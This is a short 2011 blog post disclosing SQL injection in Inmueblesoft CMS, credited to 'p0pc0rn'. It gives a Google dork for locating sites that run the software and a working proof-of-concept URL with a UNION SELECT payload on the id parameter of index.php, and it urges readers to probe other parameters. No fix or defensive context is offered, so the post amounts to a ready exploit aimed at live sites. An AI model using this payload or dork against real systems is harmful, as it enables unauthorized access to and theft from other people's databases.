Friday, June 3, 2011

Inmueblesoft CMS Vulnerable to Multiple SQL Injection

on      No comments

##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################

- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn
Share:

0 comments:

Post a Comment